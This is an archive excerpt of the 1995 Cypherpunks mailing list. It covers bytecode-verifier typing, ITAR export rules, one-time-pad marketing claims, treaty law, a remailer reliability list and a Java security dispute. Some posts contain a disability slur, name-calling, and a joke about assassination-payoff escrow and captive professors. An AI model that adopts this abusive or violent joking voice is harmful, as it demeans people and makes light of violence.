			before:  ...,int
			after:	 ...

	jmp <add>	== jump to adddress add
			before: ...
			after: ...

VALID
	load-int  1	; stack = (int)
	load-int  1	; stack = (int), (int)
	add-int		; stack = (int)

INVALID
	load-int 1	; stack = (int)
	load-float 1.0	; stack = (int) (float)
	add-int		; error, stack != (int), (int)

VALID
	load-int 2	;stack = (int)
	blt 1, a  	;stack = null
	load-int 3	; stack = (int)
	jmp b		; stack = (int)
    a	load-int 1	; stack = (int);
    b 	load-int 4	; stack = (int) (int)
	add-int		; stack = (int)

INVALID
	load-int 2	;stack = (int)
	blt 1, a  	;stack = null
	load-float 3	; stack = (float)
	jmp b		; stack = (float)	
    a	load-int 1	; stack = (int);	
    b 	load-int 4	; stack = ERROR (float || int)
	add-int		; stack = (int) ERROR

This last example is invlaid, even though it's possible in this case to show 
dynamically that the program will always arrive at b with an int on the 
stack; there are still two control paths that arive at b, one with an 
int, the other with a float.

I hope this makes sense

Simon





From jrl at trel.demon.co.uk  Mon Nov 13 03:12:09 1995
From: jrl at trel.demon.co.uk (John Lewell)
Date: Mon, 13 Nov 1995 19:12:09 +0800
Subject: Who needs time vaults anyway?
Message-ID: <v01530500accc226554a7@[158.152.10.34]>


Dan Oelke writes:
>Now, if we just had objects between 1 and 10 light years away
>that you could bounce lasers off of...... ;-)

There are plenty of objects out there. But isn't there some danger of
attracting the attention of high-spending aliens?

----------------------------------------------------------------------------
John Lewell...66a St John's Wood High Street  London NW8 7SH  United Kingdom
tel: +44 171 722 3098...fax: +44 171 483 1063....email: jrl at trel.demon.co.uk
Trel...The Commercial Internet Product Finder..<http://www.lpac.ac.uk/Trel/>








From shields at tembel.org  Mon Nov 13 04:05:11 1995
From: shields at tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 20:05:11 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <4845bj$7gb@yage.tembel.org>


-----BEGIN PGP SIGNED MESSAGE-----

Ack.  Corrections.

In article <483l88$1f0 at yage.tembel.org>, I wrote:
> You could do this with a reflector $ct/2$ metres away, assuming your
> opponent and you are in the same location.

Also assuming your attacker cannot use the information until he can get
it back to Earth, or else he could just race towards the reflector and
catch it on the way back.

> the diameter of the solar system is about 5.4 light-hours

The *radius* of the solar system is about 5.4 light-hours.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKWYqeyjYMb1RsVfAQEkAQP+Id4Y9uJhwC3ywRDMAeCMh3XDHnznKN7V
njNlvkf8hQ9jLVPBbI5rBVRS4ddfmm9SXu9yiTYGpm1Jx29OIYf4Ew4GxUYKFpJc
qM95K9DVRtNuYa2ZHMRVX+znV+der+DxPW8tFt9UXL+PpRfygCPgJJD5CGTcDD8L
5YRZUSthj+U=
=tQ2G
-----END PGP SIGNATURE-----
-- 
Shields.





From chen at intuit.com  Mon Nov 13 04:06:25 1995
From: chen at intuit.com (Mark Chen)
Date: Mon, 13 Nov 1995 20:06:25 +0800
Subject: POTP Security
In-Reply-To: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
Message-ID: <9511120717.AA25332@doom>



> On 11 10 95 jgrubs at left.webcasters.com inquired about POTP 
> security: 
>  
>  What level of security does this cute, little puppy provide??? 
>  
>  
> One approach to answering that inquiry is an excerpt from: 
>  
>  Date: Sat, 21 OCT 95 10:58:51 -0500 
>  From: Paul Jackman <jacktech at delphi.com>
>  Newgroups: talk.politics.crypto
>  Subject: Re: Elementrix One-Time Pad 
> 
>  
>  ...mine [Jackman's background and experience] goes back to 1961 
>  as Crypto Communications Control Command Center Supervisor for 
>  the National Security Agency (NSA), and US Army Inteligence Se- 
>  curity.  Even so, I do not consider myself expert in either the 
>  technical sense or the historical sense.  But, I know enough not 
>  to comment on algorithms that I don't have access to.
>  
>  The algorithm will be published when patent protection is assured.
>  It is currently patent pending in several countries.
>  
>  As far as marketing goes, this product is not going to disapear.
>  We have been premarketing security technology for four years through
>  beta, and one year in pilot with international Fortune 100 companies.
>  The initial presentations on Internet about a year ago showed us that
>  the the newness and complexity of the Algorithm had to be presented
>  one on on one to the experts which Elementrix has done.  There is a 
>  long parade of companies that have implimented this technology but 
>  do not wish to be named, (Typical of any security implementation. 
>  Those who do aknowledge the integity of the products are noteworthy, 
>  Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mer- 
>  gent, and there will be many more.

Also noteworthy are those who have examined the product under NDA and
declined to give an endorsement.


--
Mark Chen 
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D





From mark at lochard.com.au  Mon Nov 13 04:09:40 1995
From: mark at lochard.com.au (Mark)
Date: Mon, 13 Nov 1995 20:09:40 +0800
Subject: Market Value of Web Pages
In-Reply-To: <acc7f59c06021004e10b@[205.199.118.202]>
Message-ID: <199511130035.AA32505@junkers.lochard.com.au>


>>If you toss arguements like this at some of the sites that would be viable for
>>the hit numbers and then explain the only way that will occur is if the crypto
>>laws are repealed, you will create a lot more lobbiers annoying their reps
>>for the cause. ecash without good crypto is like the Federal Reserve
>>deliverying cash with open pickup trucks. Or doing credit card purchases on
>>postcards.
>
>And if you make arguments that this is easy to do, and add that crypto laws
>are stopping this from happening, you risk losing your credibility.
>
>The current crypto export laws are a pain, but are not stopping these
>"million hits a day" transactions. Recall that the 40 bits allowed in
>Netscape for export took some non-trivial number of machine-hours to crack
>(I'm talking about the brute force crack by Damien G. and others, not the
>more recent exploitation of the RNG weakness). While this brute force crack
>showed the limitations of the 40-bit key for certain transactions, it is
>not a viable attack on a single transaction whose value is pennies.

My point was (and I failed to mention it :) that to protect against stolen
funds you need to encrypt the transactions using strong crypto. Amongst US
juridictions this is possible so long as you license the technologies... so
be it. The achilles heel for global secure business from the US is the ITAR
limitations. This weakens the crypto to levels that are breachable by quite
a lot of people.  As machines get faster and the ITAR laws keep the MTTB
(Mean Time To Break) down it will become more and more efficient to collect
and exploit electronic cash or credit cards.

In other words, if you want to run a trusted global electronic cash based
business then you need strong crypto otherwise someone will break your
transfers and therefore reputation and noone will want to do business with
you over the inet. At the very least it will cost you PR $ to curb any
damage done. Just ask Netscape.

You can live fine with the 250 million people in the US buying your product,
but with 5 billion potential users out there globally, (with various degrees
of connectivity), it makes sense to enable them to buy from you too.

Off topic:
Personally I dont see the relevance of ITAR and crypto any more. When was the
last time any one was prosecuted under its statutes? What is the point of
banning exportation of software which is widely available outside the US
anyway? It's idiocy. Any foreign power or cartel wanting secure comms is not
going to balk at using any method that can, irrespective of its legality
in the eyes of the US. With their resources they can construct secure OTP
systems by sending in people with a couple of "music CDs" in their briefcase.

Mark
mark at lochard.com.au





From perry at piermont.com  Mon Nov 13 04:32:35 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 13 Nov 1995 20:32:35 +0800
Subject: DejaNews all over again
In-Reply-To: <199511131056.CAA06282@jobe.shell.portal.com>
Message-ID: <199511131202.HAA01945@jekyll.piermont.com>



I, too, would advise NetScape to ignore this loon. Whether the person
behind it is "Dr." you-know-who or Detweiler or some third party loon
is immaterial. The fact of the matter is that although NetScape has
had security issues, the ones brought up by "Alice" are totally bogus.

.pm

anonymous-remailer at shell.portal.com writes:
> On Sat, 11 Nov 1995, Ray Cromwell wrote:
> 
> >> I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
> >> spokesperson, I think that you should rethink what you're suggesting. 
> >> Your tactics won't serve your personal interests on this one.  I really
> >> would recommend that you come clean.  This is not about "gloating".  I 
> >> really take very little pleasure in this.
> > 
> >   Jeff, I think it's in your best interest to not waste your time
> > responding to this moron (who bears many features in common with
> > Detweiler)
> 
> I'm sure that most lawyers are probably advising Netscape's founders
> to not respond -- just like Fuhrman, they should take the fifth
> on this one. 
> 
> Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this
> smells like a failure to disclose a material event.  Netscape stock has
> advanced almost 50% since the Bugs Bunny post. 
> 
> Some investors are gonna be mighty pissed.
> 
> Then again, what would I know ...
> 
> 
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                   ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
> 
> 





From tcmay at got.net  Mon Nov 13 04:36:33 1995
From: tcmay at got.net (Timothy C. May)
Date: Mon, 13 Nov 1995 20:36:33 +0800
Subject: coding and nnet's
Message-ID: <accc2f98010210047312@[205.199.118.202]>


At 11:40 PM 11/11/95, Michael Pierson wrote:

>I wouldn't be surprised to learn of somebody like FinCEN using
>neural-net systems to do pattern analysis on funds transfers and
>the like, or the NRO or NSA investing research money into investigating
>the usefulness of NNs for image processing or for scanning raw ELINT,
>SIGINT or COMINT data.  In fact, I'd be quite surprised if they weren't.

These are well-known applications. The drug enforcement folks have programs
running at a place called the "El Paso Information Center" (EPIC), from
what I recall. Analyzing flights, passenger lists, etc., using various
AI/pattern recognition programs. (Some say the El Paso locale has tendrils
reaching to E Systems, Cray installations, etc., but I wouldn't know.)

I recall reading of some contracts let out, and other RFCs, for AI programs
for FinCEN use. Not surprising. (If I ran FinCEN, this is what I'd surely
have a bunch of folks working on. Scary thought.)

A bunch of AI-oriented job shops, such as Kestrel Institute and ADS, have
links to intelligence and law enforcement. Really too many possible
examples, and not surprising.

>While NNs may not be of direct relevance to cryptanalysis, I suspect
>they are, or will be, of great relevance to the task of identifying
>what communications should be cryptanalyzed or otherwise scrutinized.
>Especially given the high volume of traffic our 'thinkpol' aspire to
>be able to listen to.

Sure. Preprocessing of intercepts and signals, etc., is a natural application.

The point about neural nets not likely to be used in pure cryptanalysis was
a carefully limited point.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From llurch at Networking.Stanford.EDU  Mon Nov 13 04:37:05 1995
From: llurch at Networking.Stanford.EDU (Richard Charles Graves)
Date: Mon, 13 Nov 1995 20:37:05 +0800
Subject: MS Corrects Press Release on "Samba" Security Problem
Message-ID: <199511130517.VAA21401@comsec.com>


The Win95 product manager let me know yesterday that they'd corrected some
of the errors on their Web server. I'm sure Microsoft is planning to
publicize the changes in greater detail, so I'll just summarize them here. 

Load the original security bugfix news release at
gopher://quixote.stanford.edu/0R1271897-1279147-/win95netbugs side-by-side
with the corrected version now at
http://www.microsoft.com/windows/software/w95fpup.htm to see the changes. 
Notable corrections are:

1. Microsoft has retracted the puzzling allegation that SMBCLIENT sends
"illegal commands" across the network. 

2. Microsoft is now a bit more forthright in acknowledging that the 
problem applies to all language versions of Win95.

They didn't change the date, and they still say that Samba is shareware. 
And they still fail to give proper credit to the third parties that
actually found the problems for Microsoft. Oh well, can't have everything. 

Microsoft has also promised that localized (foreign-language) versions of
the "updated files that address the issue" will be made available within
two weeks. I still don't understand what the hold-up is, but a time frame 
is good.

In addition, Microsoft is reconsidering the position of the NE4100 and
certain NE2000- compatible PCMCIA cards like the EFA-207 on the hardware
compatibility list because, well, they aren't. 

Yusuf has given his imprimatur of Official Microsoft Response to the
discussion of the well-known IPX SAP routing and security issue saved at
gopher://quixote.stanford.edu/0R161799-178969-/win95netbugs. Previously
this had only been posted with the "speaking only for myself" disclaimer,.
Microsoft had acknowledged only the specific "server name conflict issue"
covered by PC Week, not the underlying general problem that has been
widely discussed on Usenet. Maybe we'll get a good article into the
Knowledge Base now. 

I'm still hoping they'll document the known and acknowledged ProviderPath 
problem with wsock32.dll.

Progress comes slowly.

-rich






From rsalz at osf.org  Mon Nov 13 04:42:41 1995
From: rsalz at osf.org (Rich Salz)
Date: Mon, 13 Nov 1995 20:42:41 +0800
Subject: Pegasus Mail
Message-ID: <9511091252.AA04699@sulphur.osf.org>


I sure hope some tells David Harris that his program is now export
controlled.  From my reading of his message, it seemed like he thinks he
"beat the system" because he didn't include actual crypto code.

Software that says "plug your own crypto here" is considered an anciliarry
device according to the ITAR.  Or, as I heard some NSA people call it,
"the classic 'crypto with a hole'."  Seems kinda silly that the hole is
the crypto, but hey that anciliiary device clause, you just gotta love
it.

If Pegasus mail were written to support generic user-loadable content
transforms, that would be different.  But even then, you have to be careful
how that's done.  If just did some global search-and-replace and came up
with "keyed compression" you wouldn't get past anyone.  But if you had an
opaque state block that the user modules could set/use/clear, and you
passed that along with your in/out buffers, then you'd be safe.  Of course,
they'd know what is really going on, but are powerless to prevent it.
	/r$





From ac at hawk.twinds.com  Mon Nov 13 04:53:48 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Mon, 13 Nov 1995 20:53:48 +0800
Subject: Information Resource Engineering Inc.
Message-ID: <Pine.HPP.3.91.951109141848.26057C-100000@hawk.twinds.com>


I'm looking for information about encryption products made by this company.
Any pointers will be appreciated.

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."






From rah at shipwright.com  Mon Nov 13 05:59:36 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 13 Nov 1995 21:59:36 +0800
Subject: (fwd) Digital Signature Patent
Message-ID: <v02120d01acccf5f21b79@[199.0.65.105]>


For those as get Info Week...

Cheers,
Bob Hettinga

--- begin forwarded text

Mime-Version: 1.0
Date: Mon, 13 Nov 1995 08:08:47 -0500
To: rah at shipwright.com
Subject: Digital Signature Patent

for your information...

-----------------------------------------------------------------------
RSA WANTS LICENSE FOR DIGITAL SIGNATURE TECHNOLOGY

RSA Data Security claims it owns the dominant patent covering
digital signature technology, and wants other companies and
government agencies to pay them license fees for using it.

The U.S. government is fighting RSA's claim, saying the digital
signature algorithm it uses in its digital signature standard
is covered by a different patent.  If RSA can make its claim
stick, the government will owe the encryption company royalties
for use of its digital signature standard.

source: Information Week
        13 Nov 95
        p20

via edupage

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From raph at CS.Berkeley.EDU  Mon Nov 13 07:14:05 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 13 Nov 1995 23:14:05 +0800
Subject: List of reliable remailers
Message-ID: <199511131450.GAA15424@kiwi.cs.berkeley.edu>


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list at kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail at extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney at shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal at alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere at bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail at c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon at anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer at ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer at utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer at flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer at rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster at remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx at c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer at bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"vishnu"} = "<mixmaster at vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo at c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer at replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer at valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer at armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk at remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono at valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster at remail.obscura.com     -----------   1:32:59  99.95%
ideath   remailer at ideath.goldenbear.com   -_.--------   5:58:20  99.94%
rmadillo remailer at armadillo.com           +++ ++++++++    39:25  99.92%
penet    anon at anon.penet.fi               ---+-------   6:09:10  99.86%
ecafe    cpunk at remail.ecafe.org           #*#*# #--*+*    38:11  99.86%
alumni   hal at alumni.caltech.edu           *+*--***+* *    13:43  99.63%
wmono    wmono at valhalla.phoenix.net       ****++-++* *    17:07  99.62%
replay   remailer at replay.com              **+**+*++* *    11:27  99.60%
vishnu   mixmaster at vishnu.alias.net       **-*+*+ **+*    14:30  99.38%
robo     robo at c2.org                      #*#*####** *     4:30  99.26%
hacktic  remailer at utopia.hacktic.nl       **+**+**** *    10:30  99.26%
spook    remailer at valhalla.phoenix.net    *****+-++* *    23:14  99.25%
flame    remailer at flame.alias.net         + +**++*** *    20:38  99.21%
portal   hfinney at shell.portal.com         #**--+#*   *    13:15  99.08%
bsu-cs   nowhere at bsu-cs.bsu.edu           *##++ ##** *     7:53  99.01%
c2       remail at c2.org                    *  -++++++      45:17  96.60%
ford     remailer at bi-node.zerberus.de     _ .    _ _-  53:08:59  93.60%
rahul    homer at rahul.net                  +-**----**+*    15:00  99.98%
extropia remail at extropia.wimsey.com            .--..-* 11:56:59  84.16%
syrinx   syrinx at c2.org                    --++++-+-  +  7:07:35  79.75%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From perry at piermont.com  Mon Nov 13 07:41:34 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 13 Nov 1995 23:41:34 +0800
Subject: Market Value of Web Pages
In-Reply-To: <199511130435.UAA08914@jobe.shell.portal.com>
Message-ID: <199511130509.AAA00319@jekyll.piermont.com>



anonymous-remailer at shell.portal.com writes:
> As an example, I'm presently preparing an unsolicited Security Review
> report for a Fortune 500 company.  It's *priced* if you will in the mid
> five figure range per page (and that includes the title page, the
> appendices, and the pages which say on them, "this page left intentionally
> blank"). 

What a ripoff. I'm preparing a solicited security report for a Fortune
500 copy right now. I'm writing it at my usual rate -- which is
exhorbitantly high, but not so high that I'm charging them five
figures an hour to write the thing, and I can't imagine needing an
hour per page, including the title and other pages.

Perry





From pkoning at chipcom.com  Mon Nov 13 07:49:41 1995
From: pkoning at chipcom.com (Paul Koning 1695)
Date: Mon, 13 Nov 1995 23:49:41 +0800
Subject: POTP Security
Message-ID: <30A78DA4@mailer2>



> From: Paul Jackman <jacktech at delphi.com>
>Newgroups: talk.politics.crypto
> Subject: Re: Elementrix One-Time Pad
>..
> The algorithm will be published when patent protection is assured.
> It is currently patent pending in several countries.

I saw that comment earlier.  It's rather a curious statement, given that the
rule of publication vs. patents is that publication before FILING kills
your ability to get the patent (in most countries) whereas publication
after filing but before grant is not an issue at all.  This explains why
you often see a mad scramble in companies when something
patentable is about to be announced at a trade show, or explained
in a white paper... the filing has to be in the mail before that happens.
But only just before... whether the patent office takes days or years
to grant the patent doesn't matter.

     paul





From s1113645 at tesla.cc.uottawa.ca  Mon Nov 13 08:16:11 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Tue, 14 Nov 1995 00:16:11 +0800
Subject: [joke] Re: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <Pine.3.89.9511121342.A25644-0100000@tesla.cc.uottawa.ca>


Tasteless joke. Do not take seriously.

On Sat, 11 Nov 1995, Robert Hettinga wrote:

> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Oh you must mean those wily hackers at Digicrime. Way to go Matt. 
My server originally had trouble looking up the host; must have been some 
last-ditch effort by those spooks at SAIC (I did note some recent obituaries
and resignations on their board, heheh...). It's all fine now though.

Excellent means of gaining employment and weapons practice. Gives new 
meaning to the phrase "affirmative action hiring". (though I still haven't seen 
my last check in the mail, guys. Hint, hint, hint.)

Just wondering, does the company presently have a market quote for 
captive CS profs? (shaddup over there! stop counting primes already)

Looking forward to the forthcoming Blacknet Unspeakable Comm-Oddities 
Exchange (a rather nice slant on AMIX, eh?). (still selling those babies, 
Tim?)









From cme at TIS.COM  Mon Nov 13 08:19:42 1995
From: cme at TIS.COM (Carl Ellison)
Date: Tue, 14 Nov 1995 00:19:42 +0800
Subject: Diffie-Hellman in GF(2^n)?
In-Reply-To: <199511130525.VAA21438@comsec.com>
Message-ID: <9511131548.AA24703@tis.com>


>From: David A Wagner <daw at CS.Berkeley.EDU>
>Date: Sun, 12 Nov 1995 14:43:53 -0800 (PST)


>``Hence the fields GF(2^n) out to be avoided in all cryptographic
>applications.''

I wonder what this implies about elliptic curve applications over
GF(2^n)...






From trei at process.com  Mon Nov 13 08:22:28 1995
From: trei at process.com (Peter Trei)
Date: Tue, 14 Nov 1995 00:22:28 +0800
Subject: Lotus Notes RSA Implementation Question
Message-ID: <9511131552.AA04995@toad.com>


> 
>1)  What is the key size used by the USA licensed version?

Charlie Kaufmann goes into moderate detail on Lotus Note's 
encryption scheme in "Network Security: Private communication
in an public world"

Each user has both strong (~512 bit)  and weak (~400 bit)  RSA keys. 
These, and strong (64 bit) or weak (40 bit) symmetrical session keys 
are used depending on the  location of the users.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei at process.com





From tien at well.sf.ca.us  Mon Nov 13 09:29:00 1995
From: tien at well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:29:00 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511131617.IAA28561@well.com>


I realize I'm a little late in this thread, but I'm pretty far behind in my
e-mail.  I oversimplify here, but what's new.

Anyway, all I wanted to say is that treaties are *not* superior to acts of
Congress, as far as I know (they do override state law).  I'm not an
international lawyer, but it was held long ago that a properly ratified
treaty is "equivalent to an act of the legislature."  Foster v. Neilson, 27
U.S. (2 Pet.) 253, 314 (1829) (Marshall, C.J.).  Note also that a treaty is
not necessarily self-executing; if it requires appropriation of funds,
Congress needs to act again.  Whether Congress may decline to implement is
unclear.  

Finally, the Supreme Court has also held that when there is conflict
between an Act of Congress and a treaty, "the last expression of the
sovereign will must control."  The Chinese Exclusion Case, 130 U.S. 581
(1889).  

Treaties may still bind the U.S. internationally, putting the U.S. in
default.  But a U.S. person would not be able to enforce any treaty-based
claim if a later U.S. law conflicts, at least in a U.S. court.  

Lee

P.S.  I'm not aware of telecom treaties that would shield one from ITAR
violations, but would be interested to know of any.  I generally refrain
from public comment on ITAR because we are in litigation, as most of you
know.

Perry wrote:

>"Peter D. Junger" writes:
>> : I understand that you are a lawyer and I'm not, but it is my
>> : understanding that international treaties come in to play on this sort
>> : of thing. For instance, in international shipments, you can transship
>> : items and substances that are illegal to possess in a country through
>> : its ports provided that the materials do not originate or terminate
>> : their shipment in the country and remain sealed in their containers
>> : throughout. It is also my understanding that items like mail and phone
>> : calls that happen to transit a country are not necessarily subject to
>> : that nations laws provided that the nation is not a terminal point for
>> : the mail or call or what have you.
>> 
>> The trouble is that the ITAR's definition of export that is relevant
>> to cryptographic software has nothing to do with exporting in the
>> normal sense, and therefore it has nothing to do with transhipments.
>
>I am starting to have trouble believing you are a lawyer. Are you
>actually telling me that treaties which explicitly indemnify
>transshipment customers against local laws are superceeded by lower
>level laws, in spite of the supremecy clause of the constitution? That
>might be what the state department would tell you, but I'd have
>trouble believing even a lobotomized mongoloid judge would let that
>stand. Treaties are treaties, period.
>
>Perry







From tien at well.sf.ca.us  Mon Nov 13 09:45:05 1995
From: tien at well.sf.ca.us (Lee Tien)
Date: Tue, 14 Nov 1995 01:45:05 +0800
Subject: The Crypto Applications we would rather not talk about
Message-ID: <199511131617.IAA28486@well.com>


>     Anonymous remailer and PGP
>     Unusual applications
>
>I dont know if anyone else caught it last year
>but High Times discovered anonymous remailers
>and PGP for an article last year for
>anonymous remote control of grow rooms.
>

Actually, the NYT Magazine did a cover story on pot growing within the last
year, and toward the end one of the Americans doing grow rooms in Holland
said specifically that he was looking toward anonymous electronic
communications as a way to control his grow rooms remotely and securely.

Lee







From rjc at clark.net  Mon Nov 13 09:51:05 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 14 Nov 1995 01:51:05 +0800
Subject: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <199511092241.OAA14102@jobe.shell.portal.com>
Message-ID: <199511131603.LAA21075@clark.net>


> 
> On Mon, 6 Nov 1995, Ray Cromwell wrote:
> 
> > > WARNING - THIS MESSAGE CONTAINS INFORMATION THAT MIGHT BE CONSIDERED AS
> > > A FLAME BY SOME READERS - IT IS LONG AND TEDIOUS - YOU ARE WARNED!
> > > 
> > > >From the Java Web pages (as combined in Firewalls/BoS):
> > > 
> > > > The language's security features (not just applets):
> > 
> > [Long list of bullshit deleted]
> 
> I don't think that this is *bullshit* ... the questions I mean ... but,
> I for one am tired of people promoting products in a manner which flies 
> in direct contravention of expert consensus.

   Dr Cohen could have answered the questions himself if he had read
the literature. What he did was equivalent to asking "how secure is DES"
based on a marketing information flyer. Java does not fly in direct
contravention of expert consensus. Java does not purport to solve
the halting problem or formally prove the correctness of algorithms.
The only phrase you can quibble with is "tamper-free/virus-free",
but how many products on the market make that claim, for instance,
over-the-counter drugs? Anyone with half a brain knows that nothing
is perfectly secure, and what those phrases really mean is
"tamper-resistant". So get over it.

  It seems that after all those Netscape bugs were found, now folks,
many of whom I consider to not be very skilled in computer science,
are trying to conduct a witch hunt against Netscape, it seems in the
hope of gaining some fame or recognition. The general tone of your
messages and Dr Cohen's, leads me to believe that you think you are
conducting some service by "exposing" these "flaws", thinking that
one day c'punks will recognize your contribution and thank you. 
My guess is that most c'punks view your analysis as content free,
and overly zealous/hostile.

-Ray







From m.landicho at biology.bbk.ac.uk  Mon Nov 13 09:57:35 1995
From: m.landicho at biology.bbk.ac.uk (Mary Rose)
Date: Tue, 14 Nov 1995 01:57:35 +0800
Subject: unsuscribe
Message-ID: <ECS9511131718A@ccs.bbk.ac.uk>


unsuscribe







From bianco at itribe.net  Mon Nov 13 10:16:10 1995
From: bianco at itribe.net (David J. Bianco)
Date: Tue, 14 Nov 1995 02:16:10 +0800
Subject: The Crypto Applications we would rather not talk about
In-Reply-To: <199511131617.IAA28486@well.com>
Message-ID: <199511131737.MAA17729@gatekeeper.itribe.net>


On Nov 13,  9:21, Lee Tien sent the following to the NSA's mail archives:
> Subject: Re: The Crypto Applications we would rather not talk about
|| 
|| Actually, the NYT Magazine did a cover story on pot growing within the last
|| year, and toward the end one of the Americans doing grow rooms in Holland
|| said specifically that he was looking toward anonymous electronic
|| communications as a way to control his grow rooms remotely and securely.
|| 

If the story were about how pot growers used locks on their doors to
keep people out, I doubt very many people would care.  The mere fact
that a computer is involved in some way turns on the hype buttons of many
journalists who would otherwise find the story unremarkable.

	David

-- 
==========================================================================
